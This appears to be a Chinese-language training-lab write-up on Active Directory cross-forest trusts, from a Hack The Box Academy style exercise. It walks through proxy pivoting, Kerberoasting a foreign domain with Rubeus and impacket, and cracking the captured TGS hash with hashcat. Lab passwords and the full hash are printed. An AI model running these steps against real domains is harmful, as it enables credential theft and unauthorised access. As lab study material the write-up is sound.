跨林攻击-概要

信任关系的标准定义是指在两个域的身份验证系统之间建立连接。除了林内信任,还有跨林的信任。 微软将林指定为 Active Directory 环境的安全边界。

1. 跨森林的信任关系

1.1. 外部信任 (External)

位于不同森林中的两个独立域之间的一种非传递性信任是一种点对点的信任。这类信任利用 SID 过滤技术。

外部信任是非传递性的,受信任域的用户可以访问信任域中的资源,但默认情况下,受信任森林中其他任何域的用户都无法访问信任森林中的任何域。访问权限的范围由各域内设置的信任配置和权限决定。

1.2. 林信任(Forest)

这是指两个森林根域之间的一种传递性信任,受信任森林中的任何用户,都可以向信任森林中的任何域进行身份验证。

1.3. 建立林信任

林信任可以通过两种方式建立:单向信任或双向信任(也称为双向互惠信任)。在双向信任中,来自两个信任域的用户都可以访问对方的资源,这是一种非常常见的配置。

单向信任中,只有“受信任域”中的用户可以访问“信任域”中的资源,反之则不行。但也有例外

需要特别注意的是:信任的方向与访问的方向是相反的
Pasted image 20260309123303.png

信任方向与访问方向相反。简而言之,域之间的信任方向会影响访问权限的授予方向。
Pasted image 20260309123421.png

2. 跨森林攻击

2.1. 常见攻击方式

基本的跨森林攻击包括:

  • Cross forest Kerboasting
  • Cross forest ASREPRoasting
  • 管理员密码重复使用
  • Foreign group membership

2.2. 实验环境

VM IP
SQL01 (SQL01.inlanefreight.ad) 10.129.5.253 (DHCP) / 172.16.118.10 (dual interface)
DC01 (DC01.inlanefreight.ad) 172.16.118.3
WS01 (WS01.child.inlanefreight.ad) 172.16.118.20
DC02 (DC02.logistics.ad) 172.16.118.252
SQL02 (SQL02.logistics.ad) 172.16.118.11
DC03 (DC03.megacorp.ad) 172.16.118.113

Pasted image 20260309123706.png

  • DC01 是 inlanefreight.ad 域内域控
  • DC02 是 logistics.ad 域内的域控
  • DC03 是 megacorp.ad 域内的域控制。

2.2.1. 内网代理

要与目标进行内网进行通信,这里用ssh在SQL01上配置动态端口转发

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# ssh -D 1080 Administrator@10.129.5.253
The authenticity of host '10.129.5.253 (10.129.5.253)' can't be established.
ED25519 key fingerprint is SHA256:n7KwAayabvsIspF8gC89sfuDWg/+ga7YPMN2y6svJMY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.5.253' (ED25519) to the list of known hosts.
Administrator@10.129.5.253's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@SQL01 C:\Users\Administrator>

SQL01机器的密码为 Test@123

然后配置一下proxychains即可

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 1080

2.3. 跨林 Kerberoasting

由于 inlanefreight.ad 和 logistics.ad 之间建立了双向信任关系,因此对它们发起 Kerberoasting 攻击是完全可行的。我们可以利用 Rubeus 等工具,从 inlanefreight.ad发起针对 logistics.ad 域名的 Kerberoasting 攻击。

2.3.1. rdp into Inlanefreight DC

proxychains xfreerdp /u:Administrator /p:'HTB_@cademy_adm!' /v:172.16.118.3 /dynamic-resolution

2.3.2. 使用rubeus进行kerberoasting

C:\Users\Administrator\Desktop>.\Rubeus.exe kerberoast /domain:logistics.ad /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : logistics.ad
[*] Searching path 'LDAP://DC02.logistics.ad/DC=logistics,DC=ad' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : pirate
[*] DistinguishedName      : CN=pirate,CN=Users,DC=logistics,DC=ad
[*] ServicePrincipalName   : Pirate/001.logistics.ad:1433
[*] PwdLastSet             : 4/5/2024 2:53:32 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*pirate$logistics.ad$Pirate/001.logistics.ad:1433@logistics.ad*$B2392F7FAA583332ECF2B3ABDA3BB9CC$393F47848765F0ADCE46729915AD2F511DCB39E7ADC5C36C02CD6F1E9C804E308D244E8597554795AB5894E95043C704E4C2868E531634969E473298F2E6A810A371E3F4361A95FF6621FD0ED37B3886AB2E42AAF78E1A87061A25BC485B30D9938EB56314528B65F1293947CACBE8F8B6CD4CF460F5D83AAC4F88A423653AD61F973B2A9A67BF08534F9A66EC710E163B1B02153B54C53AB550363571EEEBF87A08639EFBA70302F67E603A6BB3D2467AB3E5307BA7B6550F64A1FD7E133AD1EF1E70E15F2ECFFB60BC8EAD30905F44FC42654432167437050072F2385B75D414650424963A093B9938D33421FE6A988372EBB3A1C20BEBC1EC9EACFE3BB2B070ABC609A53D8DBB82B82AFF84E0294695FAE176BC6696DD8D539A010CC30BD078F63FE9C065D29A60CE82B385861B033CD4EB73EFB3944D884218CCD0355C45C774B6BCA8EFA8BE2CB7FED955A2424B41CCF020E625F49B1BC315A22399D4DC7DA5FD44BC1B9F0F00561F77C32C4E492C51D34B1A08FE04568ADFCA914C01B5B09EB98197701D8074A0EAA163D74816625031F471DA85A069F3BCCEAE62DAE56AE88231584464F13829D44B005D15E23E8B4BD7FA6CCA28F81D6B187CB88385121A6377EE5CC4918B912DCBAF22AF7999EAFC8C9E85B5AD13F2A682562A580658BA1EF94152A7B11AF5C073AFF1A17ED96304C652E2023BEBFAF2713CB10E54E2673F1655B884612AFE3160FC7F45DE11A405DE3DF305CD0668B39715D73C722D09054E183D5495A1B48F0DAC9B708836656E135E4E1DA67DAB1573D66224DDE6BC1C7DAA14E6882BF9A601193427B1217718DA6C72ED25903AB25F0DD21575ECB04819CEB7A6660BF838102F959F63AE1EDE5FF9CDF5C34B056B1E08E459F9EE94DF09DAC20390011F41FBF6CC7FA782FB5A7734B0477630FFC151E78D7D59A850799F9C9511A7E6E1EAA8323DEAC2C0AACA3D6BCDC46DDA9FCA6FD42A15E3B8258CD886AA2732D66CDFA9F9673A92DAE13BCFE2AC5962FE88F8683D952185A427888687B78FE01C4681916AD813D266C7729386E7B7CF18A12795977DFF710B5F60BC6FB15C3D338899321AE69DACB5C6120F76EB9370C90E462A642EF57EFC7CD69AFB73B99BE06EA18E417A039C90963AFB4762C4745A7CEA09E417251AC1AD8EEFA6025B4FB8E5B703EF9A69850EB0307E41EF1552FEA1AB43DC40D083629ADD39B024F35A6D7DA1C7AFB2D396C6F6C47959A66E845F537EE380BB0E8B6D33B74081C6EA80CE24860F881850262A7EA65CAB2BE04FE80CC81F6912969BAA8A86DE40FB9E6D343E105948F04842AAE5055E9D70698BA9DE620DB269D0BE136FBE7353D47116E43FAF4F3B5F88B78BB620253F1289CE8967184A0427EED61B5E0D8774FC5F89D5313AAFE88B6858E29C4BEC87D01A5EC67E38AAEDF05CEA46EB01CA21584EE4B28C76735A7118759FD2CAD438F61245A01B65B844F7641D8D06502490E3BBB13974A8F6DF3422F439BED38ED6247CACB79BE3809F1BAF2927D74077FFBB4084DE6EBC02EF7F149190CA5DF334993BA2D7A49604E6B04722DF061C8AC5682513

也可以使用impacket-GetUserSPNs

proxychains -q GetUserSPNs.py -target-domain logistics.ad inlanefreight.ad/administrator:'HTB_@cademy_adm!' -dc-ip 172.16.118.3 -request

2.3.3. 破解哈希

$krb5tgs$23$*pirate$logistics.ad$Pirate/001.logistics.ad:1433@logistics.ad*$b2392f7faa583332ecf2b3abda3bb9cc$393f47848765f0adce46729915ad2f511dcb39e7adc5c36c02cd6f1e9c804e308d244e8597554795ab5894e95043c704e4c2868e531634969e473298f2e6a810a371e3f4361a95ff6621fd0ed37b3886ab2e42aaf78e1a87061a25bc485b30d9938eb56314528b65f1293947cacbe8f8b6cd4cf460f5d83aac4f88a423653ad61f973b2a9a67bf08534f9a66ec710e163b1b02153b54c53ab550363571eeebf87a08639efba70302f67e603a6bb3d2467ab3e5307ba7b6550f64a1fd7e133ad1ef1e70e15f2ecffb60bc8ead30905f44fc42654432167437050072f2385b75d414650424963a093b9938d33421fe6a988372ebb3a1c20bebc1ec9eacfe3bb2b070abc609a53d8dbb82b82aff84e0294695fae176bc6696dd8d539a010cc30bd078f63fe9c065d29a60ce82b385861b033cd4eb73efb3944d884218ccd0355c45c774b6bca8efa8be2cb7fed955a2424b41ccf020e625f49b1bc315a22399d4dc7da5fd44bc1b9f0f00561f77c32c4e492c51d34b1a08fe04568adfca914c01b5b09eb98197701d8074a0eaa163d74816625031f471da85a069f3bcceae62dae56ae88231584464f13829d44b005d15e23e8b4bd7fa6cca28f81d6b187cb88385121a6377ee5cc4918b912dcbaf22af7999eafc8c9e85b5ad13f2a682562a580658ba1ef94152a7b11af5c073aff1a17ed96304c652e2023bebfaf2713cb10e54e2673f1655b884612afe3160fc7f45de11a405de3df305cd0668b39715d73c722d09054e183d5495a1b48f0dac9b708836656e135e4e1da67dab1573d66224dde6bc1c7daa14e6882bf9a601193427b1217718da6c72ed25903ab25f0dd21575ecb04819ceb7a6660bf838102f959f63ae1ede5ff9cdf5c34b056b1e08e459f9ee94df09dac20390011f41fbf6cc7fa782fb5a7734b0477630ffc151e78d7d59a850799f9c9511a7e6e1eaa8323deac2c0aaca3d6bcdc46dda9fca6fd42a15e3b8258cd886aa2732d66cdfa9f9673a92dae13bcfe2ac5962fe88f8683d952185a427888687b78fe01c4681916ad813d266c7729386e7b7cf18a12795977dff710b5f60bc6fb15c3d338899321ae69dacb5c6120f76eb9370c90e462a642ef57efc7cd69afb73b99be06ea18e417a039c90963afb4762c4745a7cea09e417251ac1ad8eefa6025b4fb8e5b703ef9a69850eb0307e41ef1552fea1ab43dc40d083629add39b024f35a6d7da1c7afb2d396c6f6c47959a66e845f537ee380bb0e8b6d33b74081c6ea80ce24860f881850262a7ea65cab2be04fe80cc81f6912969baa8a86de40fb9e6d343e105948f04842aae5055e9d70698ba9de620db269d0be136fbe7353d47116e43faf4f3b5f88b78bb620253f1289ce8967184a0427eed61b5e0d8774fc5f89d5313aafe88b6858e29c4bec87d01a5ec67e38aaedf05cea46eb01ca21584ee4b28c76735a7118759fd2cad438f61245a01b65b844f7641d8d06502490e3bbb13974a8f6df3422f439bed38ed6247cacb79be3809f1baf2927d74077ffbb4084de6ebc02ef7f149190ca5df334993ba2d7a49604e6b04722df061c8ac5682513:killer

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*pirate$logistics.ad$Pirate/001.logisti...682513
Time.Started.....: Mon Mar 09 14:56:10 2026 (0 secs)
Time.Estimated...: Mon Mar 09 14:56:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 56591.3 kH/s (6.22ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 786432/14344388 (5.48%)
Rejected.........: 0/786432 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> soniya9292
Hardware.Mon.#01.: Temp: 37c Util:  1% Core:1890MHz Mem:7001MHz Bus:8

3. Refereces: